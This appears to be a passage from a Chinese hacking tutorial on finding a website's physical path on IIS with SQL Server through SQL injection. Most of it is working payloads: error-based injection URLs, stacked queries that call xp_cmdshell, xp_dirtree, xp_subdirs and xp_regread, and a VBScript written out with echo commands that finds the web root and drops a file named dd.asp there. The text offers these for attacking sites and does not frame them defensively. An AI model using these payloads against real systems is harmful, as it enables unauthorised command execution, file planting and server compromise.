再依次爆出表中的目录名称!好我们继续语句:http:///down/list.asp?id=1 and 0<>(select top 1 paths fromdirs where paths not in( ’@Inetpub’,’test’))--返回:Microsoft OLE DB Provider for SQL Server 错误80040e07将varchar 值’haha’转换为数据类型为int 的列时发生语法错误。

再依次爆出表中的目录名称!好了,你应该知道怎么做了吧,哈哈,就是把得到的表名添到那个括号里,有多少就放多少吧,一点技巧:有时候你会发现当输入类似/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-时不是显示出错,而是网页显示正常晕了吧,别紧张哈看看0<>(select top 1 paths from dirs) 说明返回是一个数字,哈哈,测试一下看看是多少吧100>(select top 1 paths from dirs)返回正常哈哈,用这种大于小于的方法很快就能猜出了好我们继续比如当出现59=(select top 1 paths from dirs)返回正常,ok,说明名字是59输入如下http:///down/list.asp?id=1 and 0<>(select top 1 paths fromdirs where paths not in( ’59’))--记得带上引号哟下面的方法就和原来的一样的了还有一个问题就是有时候用上面的方法输入59时,发现下一次的文件夹还是59这个是怎么回事情呢?呵呵,不知道你有没有注意过059和59是一样的?就是这个原因了,哈哈,http:///down/list.asp?id=1 and 0<>(select top 1 paths fromdirs where paths not in( ’059’))--发现显示下一个文件夹名字了,ok优缺点分析:优点就是所有的sqlserver用户都可以使用,因为xp_dirtree适用权限PUBLIC,缺点是显示的是目录下的所有文件夹的名字,而且排列好像是没有什么顺序的,总之在好几千好几万个文件夹里找你想要的文件夹是痛苦的.而且你知道了有那个文件夹也不能保证在根目录下,实在是痛苦的一件事情呀,很多时候是靠运气和耐力.祝你成功方法二:利用xp_cmdshell哈哈,这个大家一定很熟悉了吧,我就简单说一下建立表语句:/down/list.asp?id=1;create table dirs(paths varchar(1000))-- 返回:正常的信息!说明建表成功!继续!(建的比原文的大一点,因为我遇过名子很长的文件,删除了那个id,因为没有什么用语句:/down/list.asp?id=1;insert dirs exec master.dbo.xp_cmdshell ’dir c:\ /B/D’--返回:正常信息。

说明写入C盘的所有目录成功了!这里用了dir c:\ /B/D,哈哈,不知道/B/D 什么作用就试验试验看语句:/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-返回:Microsoft OLE DB Provider for SQL Server 错误80040e07将varchar 值’@Inetpub’转换为数据类型为int 的列时发生语法错误。

再依次爆出表中的目录名称!语句:http:///down/list.asp?id=1and 0<>(select top 1 paths fromdirs where paths not in( ’@Inetpub’))--返回:Microsoft OLE DB Provider for SQL Server 错误80040e07将varchar 值’test’转换为数据类型为int 的列时发生语法错误。

再依次爆出表中的目录名称!方法同上,就不说了有时候我们也可以用下面的两个扩展来干些事情1)我们可以利用xp_availablemedia来获得当前所有驱动器,并存入dirs表中:5 ;insert dirs exec master.dbo.xp_availablemedia;--我们可以通过查询temp的内容来获得驱动器列表及相关信息(2)我们可以利用xp_subdirs获得子目录列表,并存入dirs表中:5 ;insert into dirs exec master.dbo.xp_subdirs ’c:\’;--优缺点分析:很明显了,这样就不会出现xp_dirtree那种所有目录都放在一起的情况了,只会显示一级目录,找起来方便多了.缺点也很明显,只有sa有这个权限,也有可能管理员删除了这个扩展(毕竟太强大了).方法三:这种方法很好下面这个是原文想到了使用adsutil.vbs程序,我是这样执行的a’;exec master..xp_cmdshell ’cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/1/root>a.txt’;--是不是很长啦通过它我们可以把iis里面第一个虚拟web站点的设置情况(当然包括它所在的实际目录咯),导入到 a.txt中对于 a.txt的实际位置默认当然是c:\winnt\system32,其实这都不是问题,不过遇到管理员把adsutil.vbs,删了或是放到别的地方我们就没办法了(不可能自已用echo 命令写一个吧)第二步:用echo命令写下面的代码到c:\中,很多吗也不算吧.....xp_cmdshell ’echo set fso1=createobject("scripting.filesystemobject")>c:\read.vbs’;-- .....xp_cmdshell ’echo Set WshShell = Wscript.createObject("Wscript.Shell")>>c:\read.vbs’;--.....-------------------read.vbs---------------------------------set fso1=createobject("scripting.filesystemobject")Set WshShell = Wscript.createObject("Wscript.Shell")spa=WshShell.Environment("process")("windir")set fil =fso1.opentextfile(spa & "\system32\aa.txt")do while not fil.atendofstreamnr=fil.readlineif left(nr,4)="Path" thenpa=mid(nr,instr(nr,")") 3,len(nr)-instr(nr,")")-3)exit doend ifloopset fil1 =fso1.opentextfile(pa &"\dd.asp",2,true)fil1.writeline ""---------------cut here-------------------------------------第三步:当然就是执行read.vbs三,这样我们可以把aa.txt中的内容读出来找到web站点的实际路径然后写一个叫dd.asp的文件在web站的根目录中,能否成功试试就知道咯执行http://x.x.x.x/dd.asp返回:\xxx哈哈,的确是好方法,不过原文好像有点问题就是set fil =fso1.opentextfile(spa %2B "\system32\aa.txt")set fil1 =fso1.opentextfile(pa%2B"\dd.asp",2,true)两句提交时会出错于是我们想到了加号,和&的功能相同还有就是写点什么东西到dd.asp呢?写入pa,哈哈哈哈,改成了-------------------read.vbs---------------------------------set fso1=createobject("scripting.filesystemobject")Set WshShell = Wscript.createObject("Wscript.Shell")spa=WshShell.Environment("process")("windir")set fil =fso1.opentextfile(spa "\system32\aa.txt")do while not fil.atendofstreamnr=fil.readlineif left(nr,4)="Path" thenpa=mid(nr,instr(nr,")") 3,len(nr)-instr(nr,")")-3)exit doend ifloopset fil1 =fso1.opentextfile(pa "\dd.asp",2,true)fil1.writeline pa---------------cut here--------------------------------------因为用浏览器提交时号被转换成了空格,所以在提交的时候还应该把变成%2B,好了,应该可以了,如下-------------------read.vbs---------------------------------set fso1=createobject("scripting.filesystemobject")Set WshShell = Wscript.createObject("Wscript.Shell")spa=WshShell.Environment("process")("windir")set fil =fso1.opentextfile(spa %2B "\system32\aa.txt")do while not fil.atendofstreamnr=fil.readlineif left(nr,4)="Path" thenpa=mid(nr,instr(nr,")") 3,len(nr)-instr(nr,")")-3)exit doend ifloopset fil1 =fso1.opentextfile(pa %2B "\dd.asp",2,true)fil1.writeline pa---------------cut here--------------------------------------如果发现1没有的话,我们可以该成2,3,4...........a’;exec master..xp_cmdshell ’cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/2/root>a.txt’;--但是这种方法只能在windows2000下使用,因为2003下新建的网站所在地址不是按照1234来排列的,好像是随机生成的,个人比较过几个2003下的地址,没有发现什么规律.优缺点分析同上xp_cmdshell不是每一个用户都可以用的!还有一个问题是adsutil文件不一定存在,或者不一定在那个路径上,当然如果你原意的话你可以用echo写一个(哈哈,老多老多行的哟),另外的一个问题是,如果主机上有很多站点怎么办?我遇到过一个有九个站点的主机,胆识只有第8个是有用的,晕了吧,很难有人有嗯那个耐性会坚持到那么多的,早就崩溃了或许.还有就是不能在2003下用!不过说实话,这个方法的确是一个好方法方法四:这个方法是要饭的提到的,通过xp_regread等从注册表里读出路径以下推荐,获取网页路径(通过存储过程达到对注册表的读取):利用内置存储过程xp_regread(读取注册表键值,权限public):语句:http:///list.asp?classid=1;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @testvarchar(20) exec master..xp_regread @rootkey= HKEY_LOCAL_MACHINE , @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\ , @value_name= / , values=@test OUTPUT insert into paths(path) values(@test)IIS的默认路径的在注册表中HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\利用爆字段将数据库的值读出来:语句:http:///list.asp?classid=1 and 0<>(select top 1 paths from newtable)--返回:Microsoft OLE DB Provider forODBC Drivers 错误80040e07 [Microsoft][ODBC SQL Server Driver][SQL Server]将varchar 值E:\www,,201 转换为数据类型为int 的列时发生语法错误。

相关文档
最新文档